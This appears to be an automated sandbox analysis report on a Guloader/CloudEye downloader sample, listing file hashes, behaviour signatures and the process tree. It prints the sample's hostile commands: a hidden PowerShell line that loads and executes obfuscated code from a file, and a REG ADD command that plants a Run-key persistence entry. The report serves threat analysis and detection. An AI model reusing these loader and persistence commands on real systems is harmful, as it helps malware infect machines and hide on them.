Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09-07-2024 11:16
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240704-en
General
-
Target
MalwareBazaar.exe
-
Size
401KB
-
MD5
f1043033237fa935ef9af72415e657a1
-
SHA1
b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
-
SHA256
a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
-
SHA512
1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
-
SSDEEP
6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\\Chet\\').Ruelike;%pantstnings% ($Uselessness)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2792 wab.exe 2792 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 1620 powershell.exe 2792 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1620 set thread context of 2792 1620 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe 1620 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1620 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1620 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
MalwareBazaar.exepowershell.exewab.execmd.exedescription pid process target process PID 2860 wrote to memory of 1620 2860 MalwareBazaar.exe powershell.exe PID 2860 wrote to memory of 1620 2860 MalwareBazaar.exe powershell.exe PID 2860 wrote to memory of 1620 2860 MalwareBazaar.exe powershell.exe PID 2860 wrote to memory of 1620 2860 MalwareBazaar.exe powershell.exe PID 1620 wrote to memory of 2792 1620 powershell.exe wab.exe PID 1620 wrote to memory of 2792 1620 powershell.exe wab.exe PID 1620 wrote to memory of 2792 1620 powershell.exe wab.exe PID 1620 wrote to memory of 2792 1620 powershell.exe wab.exe PID 1620 wrote to memory of 2792 1620 powershell.exe wab.exe PID 1620 wrote to memory of 2792 1620 powershell.exe wab.exe PID 2792 wrote to memory of 2724 2792 wab.exe cmd.exe PID 2792 wrote to memory of 2724 2792 wab.exe cmd.exe PID 2792 wrote to memory of 2724 2792 wab.exe cmd.exe PID 2792 wrote to memory of 2724 2792 wab.exe cmd.exe PID 2724 wrote to memory of 2772 2724 cmd.exe reg.exe PID 2724 wrote to memory of 2772 2724 cmd.exe reg.exe PID 2724 wrote to memory of 2772 2724 cmd.exe reg.exe PID 2724 wrote to memory of 2772 2724 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"4⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:2772
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
350KB
MD5be381f7baf52513e52dfed9361a6dc69
SHA1a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
SHA256caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
SHA512c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a
-
Filesize
69KB
MD58172795f7c8cfb7cc597e879d2b0b468
SHA1811797a9309a1bc3429f3bc7735eb6af1a7c80dc
SHA2565339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
SHA5129718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322